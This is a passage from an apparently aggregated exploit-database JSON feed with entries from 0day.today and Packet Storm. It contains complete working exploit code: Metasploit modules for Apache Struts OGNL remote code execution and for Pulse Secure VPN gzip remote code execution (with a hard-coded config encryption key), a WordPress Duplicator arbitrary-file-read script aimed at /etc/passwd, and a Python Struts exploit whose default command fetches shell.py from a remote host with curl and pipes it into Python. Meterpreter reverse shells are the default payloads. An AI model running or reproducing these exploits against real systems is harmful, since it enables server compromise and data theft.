:unix_cmd\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date\n 'Notes' =>\n {\n 'Stability' => [ CRASH_SAFE, ],\n 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ]\n },\n 'DefaultTarget' => 0\n )\n )\n\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]),\n OptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']),\n OptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']])\n ])\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]),\n OptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request'])\n ])\n end\n\n def check\n num1 = rand(1000..9999)\n num2 = rand(1000..9999)\n\n res = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\"))\n if res.nil?\n return CheckCode::Unknown\n elsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty?\n return CheckCode::Safe\n end\n\n return CheckCode::Appears\n end\n\n def exploit\n cve = datastore['CVE']\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\")\n\n if cve == 'CVE-2019-0230'\n ognl = []\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']'\n ognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)'\n ognl << '#ognlUtil.setExcludedClasses(\\'\\')'\n ognl << '#ognlUtil.setExcludedPackageNames(\\'\\')'\n res = send_request_cgi(build_http_request(cve, ognl))\n fail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200\n end\n\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded, { cve: cve })\n when :linux_dropper\n execute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 })\n end\n end\n\n def execute_command(cmd, opts = {})\n send_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5)\n end\n\n def build_http_request(cve, ognl)\n ognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array\n\n http_request_parameters = { 'uri' => normalize_uri(target_uri.path) }\n http_request_parameters['cookie'] = datastore['HttpCookie'] unless datastore['HttpCookie'].blank?\n if cve == 'CVE-2019-0230'\n http_request_parameters['method'] = 'GET'\n http_request_parameters['vars_get'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n elsif cve == 'CVE-2020-17530'\n http_request_parameters['method'] = 'POST'\n http_request_parameters['vars_post'] = { datastore['NAME'] => \"%{#{ognl}}\" }\n end\n http_request_parameters\n end\n\n def build_ognl(cve, cmd)\n cmd = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ognl = []\n if cve == 'CVE-2019-0230'\n ognl << '#context=#attr[\\'struts.valueStack\\'].context'\n ognl << '#context.setMemberAccess(@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)'\n ognl << \"@java.lang.Runtime@getRuntime().exec(\\\"#{cmd}\\\")\"\n elsif cve == 'CVE-2020-17530'\n ognl << '#instancemanager=#application[\"org.apache.tomcat.InstanceManager\"]'\n ognl << '#stack=#attr[\"com.opensymphony.xwork2.util.ValueStack.ValueStack\"]'\n ognl << '#bean=#instancemanager.newInstance(\"org.apache.commons.collections.BeanMap\")'\n ognl << '#bean.setBean(#stack)'\n ognl << '#context=#bean.get(\"context\")'\n ognl << '#bean.setBean(#context)'\n ognl << '#macc=#bean.get(\"memberAccess\")'\n ognl << '#bean.setBean(#macc)'\n ognl << '#emptyset=#instancemanager.newInstance(\"java.util.HashSet\")'\n ognl << '#bean.put(\"excludedClasses\",#emptyset)'\n ognl << '#bean.put(\"excludedPackageNames\",#emptyset)'\n ognl << '#execute=#instancemanager.newInstance(\"freemarker.template.utility.Execute\")'\n ognl << \"#execute.exec({\\\"#{cmd}\\\"})\"\n end\n\n ognl\n end\nend\n", "sourceHref": "https://0day.today/exploit/35571", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T16:39:24", "description": "The Pulse Connect Secure appliance versions prior to 9.1R9 suffer from an uncontrolled gzip extraction vulnerability which allows an attacker to overwrite arbitrary files, resulting in remote code execution as root. Admin credentials are required for successful exploitation.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-18T00:00:00", "type": "zdt", "title": "Pulse Secure VPN Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8260"], "modified": "2020-12-18T00:00:00", "id": "1337DAY-ID-35525", "href": "https://0day.today/exploit/description/35525", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n ENCRYPTION_KEY = \"\\x7e\\x95\\x42\\x1a\\x6b\\x88\\x66\\x41\\x43\\x1b\\x32\\xc5\\x24\\x42\\xe2\\xe4\\x83\\xf8\\x1f\\x58\\xb0\\xe9\\xe9\\xa5\".b\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Pulse Secure VPN gzip RCE',\n 'Description' => %q{\n The Pulse Connect Secure appliance before 9.1R9 suffers from an uncontrolled gzip extraction vulnerability\n which allows an attacker to overwrite arbitrary files, resulting in Remote Code Execution as root.\n Admin credentials are required for successful exploitation.\n Of note, MANY binaries are not in `$PATH`, but are located in `/home/bin/`.\n },\n 'Author' => [\n 'h00die', # msf module\n 'Spencer McIntyre', # msf module\n 'Richard Warren <[email\u00a0protected]>', # original PoC, discovery\n 'David Cash <[email\u00a0protected]>', # original PoC, discovery\n ],\n 'References' => [\n ['URL', 'https://gist.github.com/rxwx/03a036d8982c9a3cead0c053cf334605'],\n ['URL', 'https://research.nccgroup.com/2020/10/26/technical-advisory-pulse-connect-secure-rce-via-uncontrolled-gzip-extraction-cve-2020-8260/'],\n ['URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601'],\n ['CVE', '2020-8260']\n ],\n 'DisclosureDate' => '2020-10-26',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix In-Memory',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_memory,\n 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic' }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp' }\n }\n ]\n ],\n 'Payload' => { 'Compat' => { 'ConnectionType' => '-bind' } },\n 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true, 'CMDSTAGER::FLAVOR' => 'curl' },\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, CONFIG_CHANGES],\n 'RelatedModules' => ['auxiliary/gather/pulse_secure_file_disclosure']\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'The URI of the application', '/']),\n OptString.new('USERNAME', [true, 'The username to login with', 'admin']),\n OptString.new('PASSWORD', [true, 'The password to login with', '123456'])\n ])\n\n register_advanced_options([\n OptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 1.5 ]),\n ])\n end\n\n def check(exploiting: false)\n login\n res = send_request_cgi({ 'uri' => normalize_uri('dana-admin', 'misc', 'admin.cgi') })\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless res&.code == 200\n version = res.body.scan(%r{id=\"span_stats_counter_total_users_count\"[^>]+>([^<(]+)(?:\\(build (\\d+)\\))?</span>})&.last\n fail_with(Failure::UnexpectedReply, 'Failed to retrieve the version information') unless version\n version, build = version\n\n return CheckCode::Unknown unless version.include?('R')\n\n version, revision = version.split('R', 2)\n print_status(\"Version #{version.strip}, revision #{revision.strip}, build #{build.strip} found\")\n return CheckCode::Appears if version.to_f <= 9.1 && revision.to_f < 9\n\n CheckCode::Detected\n rescue Msf::Exploit::Failed\n CheckCode::Unknown\n ensure\n logout unless exploiting\n end\n\n def exploit\n case (checkcode = check(exploiting: true))\n when Exploit::CheckCode::Vulnerable, Exploit::CheckCode::Appears\n print_good(checkcode.message)\n when Exploit::CheckCode::Detected\n print_warning(checkcode.message)\n else\n fail_with(Module::Failure::Unknown, checkcode.message.to_s)\n end\n\n case target['Type']\n when :unix_memory\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager(\n linemax: 262144, # 256KiB\n delay: datastore['CMDSTAGER::DELAY']\n )\n end\n\n logout\n end\n\n def execute_command(command, _opts = {})\n trigger = Rex::Text.rand_text_alpha_upper(8)\n print_status(\"Exploit trigger will be at #{normalize_uri('dana-na', 'auth', 'setcookie.cgi')} with a header of #{trigger}\")\n\n config = build_malicious_config(command, trigger)\n res = upload_config(config)\n\n fail_with(Failure::UnexpectedReply, 'File upload failed') unless res&.code == 200\n\n print_status('Triggering RCE')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'setcookie.cgi'),\n 'headers' => { trigger => trigger }\n })\n end\n\n def res_get_xsauth(res)\n res.body.scan(%r{name=\"xsauth\" value=\"([^\"]+)\"/>})&.last&.first\n end\n\n def upload_config(config)\n print_status('Requesting backup config page')\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi'),\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'vars_get' => { 'type' => 'system' }\n })\n fail_with(Failure::UnexpectedReply, 'Failed to request the backup configuration page') unless res&.code == 200\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Failed to get the xsauth token') if xsauth.nil?\n\n post_data = Rex::MIME::Message.new\n post_data.add_part(xsauth, nil, nil, 'form-data; name=\"xsauth\"')\n post_data.add_part('Import', nil, nil, 'form-data; name=\"op\"')\n post_data.add_part('system', nil, nil, 'form-data; name=\"type\"')\n post_data.add_part('8', nil, nil, 'form-data; name=\"optWhat\"')\n post_data.add_part('', nil, nil, 'form-data; name=\"txtPassword1\"')\n post_data.add_part('Import Config', nil, nil, 'form-data; name=\"btnUpload\"')\n post_data.add_part(config, 'application/octet-stream', 'binary', 'form-data; name=\"uploaded_file\"; filename=\"system.cfg\"')\n\n print_status('Uploading encrypted config backup')\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'import.cgi'),\n 'method' => 'POST',\n 'headers' => { 'Referer' => \"#{full_uri('/dana-admin/cached/config/config.cgi')}?type=system\" },\n 'data' => post_data.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\n })\n end\n\n def login\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'tz_offset' => '-300',\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'realm' => 'Admin Users',\n 'btnSubmit' => 'Sign In'\n },\n 'keep_cookies' => true\n })\n\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 302\n location = res.headers['Location']\n fail_with(Failure::NoAccess, 'Login failed') if location.include?('failed')\n\n return unless location.include?('admin%2Dconfirm')\n\n # if the account we login with is already logged in, or another admin is logged in, a warning is displayed. Click through it.\n print_status('Other admin sessions detected, continuing')\n res = send_request_cgi({ 'uri' => location, 'keep_cookies' => true })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\n fds = res.body.scan(/name=\"FormDataStr\" value=\"([^\"]+)\">/).last\n xsauth = res_get_xsauth(res)\n fail_with(Failure::UnexpectedReply, 'Login failed (missing form elements)') unless fds && xsauth\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'dana-na', 'auth', 'url_admin', 'login.cgi'),\n 'method' => 'POST',\n 'vars_post' => {\n 'btnContinue' => 'Continue the session',\n 'FormDataStr' => fds.first,\n 'xsauth' => xsauth\n },\n 'keep_cookies' => true\n })\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res\n end\n\n def logout\n print_status('Logging out to prevent warnings to other admins')\n res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'dana-admin', 'cached', 'config', 'config.cgi') })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 200\n\n logout_uri = res.body.scan(%r{/dana-na/auth/logout\\.cgi\\?xsauth=\\w+}).first\n fail_with(Failure::UnexpectedReply, 'Logout failed') if logout_uri.nil?\n\n res = send_request_cgi({ 'uri' => logout_uri })\n fail_with(Failure::UnexpectedReply, 'Logout failed') unless res&.code == 302\n end\n\n def build_malicious_config(cmd, trigger)\n payload_script = \"#{Rex::Text.rand_text_alphanumeric(rand(6..13))}.sh\"\n perl = <<~PERL\n if (length $ENV{HTTP_#{trigger}}){\n chmod 0775, \"/data/var/runtime/tmp/tt/#{payload_script}\";\n system(\"env /data/var/runtime/tmp/tt/#{payload_script}\");\n }\n PERL\n tarfile = StringIO.new\n Gem::Package::TarWriter.new(tarfile) do |tar|\n tar.mkdir('tmp', 509)\n tar.mkdir('tmp/tt', 509)\n tar.add_file('tmp/tt/setcookie.thtml.ttc', 511) do |tio|\n tio.write perl\n end\n tar.add_file(\"tmp/tt/#{payload_script}\", 511) do |tio|\n tio.write \"PATH=/home/bin:$PATH\\n\"\n tio.write \"rm -- \\\"$0\\\"\\n\"\n tio.write cmd\n end\n end\n\n gzfile = StringIO.new\n gz = Zlib::GzipWriter.new(gzfile)\n gz.write(tarfile.string)\n gz.close\n\n encrypt_config(gzfile.string)\n end\n\n def encrypt_config(config_blob)\n cipher = OpenSSL::Cipher.new('DES-EDE3-CFB').encrypt\n iv = cipher.iv = cipher.random_iv\n cipher.key = ENCRYPTION_KEY\n\n md5 = OpenSSL::Digest.new('MD5', \"#{iv}\\x00#{[config_blob.length].pack('V')}\")\n\n ciphertext = cipher.update(config_blob)\n ciphertext << cipher.final\n md5 << ciphertext\n\n cipher.reset\n \"\\x09#{iv}\\x00#{[ciphertext.length].pack('V') + ciphertext + cipher.update(md5.digest) + cipher.final}\"\n end\nend\n", "sourceHref": "https://0day.today/exploit/35525", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-04T15:49:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-10-18T00:00:00", "type": "zdt", "title": "Wordpress Duplicator 1.3.26 Plugin - Unauthenticated Arbitrary File Read Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11738"], "modified": "2021-10-18T00:00:00", "id": "1337DAY-ID-36914", "href": "https://0day.today/exploit/description/36914", "sourceData": "# Exploit Title: Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read\n# Exploit Author: nam3lum\n# Vendor Homepage: https://wordpress.org/plugins/duplicator/\n# Software Link: https://downloads.wordpress.org/plugin/duplicator.1.3.26.zip]\n# Version: 1.3.26\n# Tested on: Ubuntu 16.04\n# CVE : CVE-2020-11738\n\nimport requests as re\nimport sys\n\nif len(sys.argv) != 3:\n print(\"Exploit made by nam3lum.\")\n print(\"Usage: CVE-2020-11738.py http://192.168.168.167 /etc/passwd\")\n exit()\n\narg = sys.argv[1]\nfile = sys.argv[2]\n\nURL = arg + \"/wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../../../..\" + file\n\noutput = re.get(url = URL)\nprint(output.text)\n", "sourceHref": "https://0day.today/exploit/36914", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-09-28T17:09:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-17T00:00:00", "type": "zdt", "title": "Apache Struts 2.5.20 - Double OGNL evaluation Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230", "CVE-2020-0230"], "modified": "2020-11-17T00:00:00", "id": "1337DAY-ID-35263", "href": "https://0day.today/exploit/description/35263", "sourceData": "# Exploit Title: Apache Struts 2.5.20 - Double OGNL evaluation\n# Exploit Author: West Shepherd\n# Vendor Homepage: https://struts.apache.org/download.cgi\n# Version: Struts 2.0.0 - Struts 2.5.20 (S2-059)\n# CVE : CVE-2019-0230\n# Credit goes to reporters Matthias Kaiser, Apple InformationSecurity, and the Github example from PrinceFPF.\n# Source(s):\n# https://github.com/PrinceFPF/CVE-2019-0230\n# https://cwiki.apache.org/confluence/display/WW/S2-059\n# *Fix it, upgrade to: https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.22\n\n# !/usr/bin/python\nfrom sys import argv, exit, stdout, stderr\nimport argparse\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nimport logging\n\n\nclass Exploit:\n def __init__(\n self,\n target='',\n redirect=False,\n proxy_address=''\n ):\n requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n self.target = target\n self.session = requests.session()\n self.redirect = redirect\n self.timeout = 0.5\n self.proxies = {\n 'http': 'http://%s' % proxy_address,\n 'https': 'http://%s' % proxy_address\n } \\\n if proxy_address is not None \\\n and proxy_address != '' else {}\n self.query_params = {}\n self.form_values = {}\n self.cookies = {}\n boundary = \"---------------------------735323031399963166993862150\"\n self.headers = {\n 'Content-Type': 'multipart/form-data; boundary=%s' % boundary,\n 'Accept': '*/*',\n 'Connection': 'close'\n }\n payload = \"%{(#nike='multipart/form-data').\" \\\n \"(#[email\u00a0protected]@DEFAULT_MEMBER_ACCESS).\" \\\n \"(#_memberAccess?(#_memberAccess=#dm):\" \\\n\n\"((#container=#context['com.opensymphony.xwork2.ActionContext.container']).\"\n\\\n\n\"(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).\"\n\\\n \"(#ognlUtil.getExcludedPackageNames().clear()).\" \\\n \"(#ognlUtil.getExcludedClasses().clear()).\" \\\n \"(#context.setMemberAccess(#dm)))).(#cmd='{COMMAND}').\" \\\n\n\"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\n\\\n\n\"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).\" \\\n \"(#p=new\njava.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).\" \\\n\n\"(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().\"\n\\\n\n\"getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\n\\\n \"(#ros.flush())}\"\n\n self.payload = \"--%s\\r\\nContent-Disposition: form-data;\nname=\\\"foo\\\"; \" \\\n \"filename=\\\"%s\\0b\\\"\\r\\nContent-Type:\ntext/plain\\r\\n\\r\\nx\\r\\n--%s--\\r\\n\\r\\n\" % (\n boundary, payload, boundary\n )\n\n def do_get(self, url, params=None, data=None):\n return self.session.get(\n url=url,\n verify=False,\n allow_redirects=self.redirect,\n headers=self.headers,\n cookies=self.cookies,\n proxies=self.proxies,\n data=data,\n params=params\n )\n\n def do_post(self, url, data=None, params=None):\n return self.session.post(\n url=url,\n data=data,\n verify=False,\n allow_redirects=self.redirect,\n headers=self.headers,\n cookies=self.cookies,\n proxies=self.proxies,\n params=params\n )\n\n def debug(self):\n try:\n import http.client as http_client\n except ImportError:\n import httplib as http_client\n http_client.HTTPConnection.debuglevel = 1\n logging.basicConfig()\n logging.getLogger().setLevel(logging.DEBUG)\n requests_log = logging.getLogger(\"requests.packages.urllib3\")\n requests_log.setLevel(logging.DEBUG)\n requests_log.propagate = True\n return self\n\n def send_payload(self, command='curl --insecure -sv\nhttps://10.10.10.10/shell.py|python -'):\n url = self.target\n stdout.write('sending payload to %s payload %s' % (url, command))\n resp = self.do_post(url=url, params=self.query_params,\ndata=self.payload.replace('{COMMAND}', command))\n return resp\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(add_help=True,\n description='CVE-2020-0230 Struts\n2 exploit')\n try:\n parser.add_argument('-target', action='store', help='Target\naddress: http(s)://target.com/index.action')\n parser.add_argument('-command', action='store',\n help='Command to execute: touch /tmp/pwn')\n parser.add_argument('-debug', action='store', default=False,\nhelp='Enable debugging: False')\n parser.add_argument('-proxy', action='store', default='',\nhelp='Enable proxy: 10.10.10.10:8080')\n\n if len(argv) == 1:\n parser.print_help()\n exit(1)\n options = parser.parse_args()\n\n exp = Exploit(\n proxy_address=options.proxy,\n target=options.target\n )\n\n if options.debug:\n exp.debug()\n stdout.write('target %s debug %s proxy %s\\n' % (\n options.target, options.debug, options.proxy\n ))\n\n result = exp.send_payload(command=options.command)\n stdout.write('Response: %d\\n' % result.status_code)\n\n except Exception as error:\n\nstderr.write('error in main %s' % str(error))\n", "sourceHref": "https://0day.today/exploit/35263", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-12-24T21:49:19", "description": "", "cvss3": {}, "published": "2020-12-24T00:00:00", "type": "packetstorm", "title": "Apache Struts 2 Forced Multi OGNL Evaluation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-0230", "CVE-2020-17530"], "modified": "2020-12-24T00:00:00", "id": "PACKETSTORM:160721", "href": "https://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Apache Struts 2 Forced Multi OGNL Evaluation', \n'Description' => %q{ \nThe Apache Struts framework, when forced, performs double evaluation of attributes' values assigned to certain tags \nattributes such as id. It is therefore possible to pass in a value to Struts that will be evaluated again when a \ntag's attributes are rendered. With a carefully crafted request, this can lead to Remote Code Execution (RCE). \n \nThis vulnerability is application dependant. A server side template must make an affected use of request data to \nrender an HTML tag attribute. \n}, \n'Author' => [ \n'Spencer McIntyre', # Metasploit module \n'Matthias Kaiser', # discovery of CVE-2019-0230 \n'Alvaro Mu\u00f1oz', # (@pwntester) discovery of CVE-2020-17530 \n'ka1n4t', # PoC of CVE-2020-17530 \n], \n'References' => [ \n['CVE', '2019-0230'], \n['CVE', '2020-17530'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-059'], \n['URL', 'https://cwiki.apache.org/confluence/display/WW/S2-061'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-059'], \n['URL', 'https://github.com/vulhub/vulhub/tree/master/struts2/s2-061'], \n['URL', 'https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2'], \n['URL', 'https://github.com/ka1n4t/CVE-2020-17530'], \n], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n} \n] \n], \n'DisclosureDate' => '2020-09-14', # CVE-2019-0230 NVD publication date \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE, ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ], \n'Reliability' => [ REPEATABLE_SESSION, ] \n}, \n'DefaultTarget' => 0 \n) \n) \n \nregister_options([ \nOpt::RPORT(8080), \nOptString.new('TARGETURI', [ true, 'A valid base path to a struts application', '/' ]), \nOptString.new('NAME', [ true, 'The HTTP query parameter or form data name', 'id']), \nOptEnum.new('CVE', [ true, 'Vulnerability to use', 'CVE-2020-17530', ['CVE-2020-17530', 'CVE-2019-0230']]) \n]) \nregister_advanced_options([ \nOptFloat.new('CMDSTAGER::DELAY', [ true, 'Delay between command executions', 0.5 ]), \nOptString.new('HttpCookie', [false, 'An optional cookie to include when making the HTTP request']) \n]) \nend \n \ndef check \nnum1 = rand(1000..9999) \nnum2 = rand(1000..9999) \n \nres = send_request_cgi(build_http_request(datastore['CVE'], \"#{num1}*#{num2}\")) \nif res.nil? \nreturn CheckCode::Unknown \nelsif res.body.scan(/([\"'])\\s*#{(num1 * num2)}\\s*\\1/).empty? \nreturn CheckCode::Safe \nend \n \nreturn CheckCode::Appears \nend \n \ndef exploit \ncve = datastore['CVE'] \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']} using #{cve}\") \n \nif cve == 'CVE-2019-0230' \nognl = [] \nognl << '#context=#attr[\\'struts.valueStack\\'].context' \nognl << '#container=#context[\\'com.opensymphony.xwork2.ActionContext.container\\']' \nognl << '#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)' \nognl << '#ognlUtil.setExcludedClasses(\\'\\')' \nognl << '#ognlUtil.setExcludedPackageNames(\\'\\')' \nres = send_request_cgi(build_http_request(cve, ognl)) \nfail_with(Failure::UnexpectedReply, 'Failed to execute the OGNL preamble') unless res&.code == 200 \nend \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded, { cve: cve }) \nwhen :linux_dropper \nexecute_cmdstager({ cve: cve, delay: datastore['CMDSTAGER::DELAY'], linemax: 512 }) \nend \nend \n \ndef execute_command(cmd, opts = {}) \nsend_request_cgi(build_http_request(opts[:cve], build_ognl(opts[:cve], cmd)), 5) \nend \n \ndef build_http_request(cve, ognl) \nognl = ognl.map { |part| \"(#{part})\" }.join('.') if ognl.is_a? Array \n \nhttp_request_parameters = { 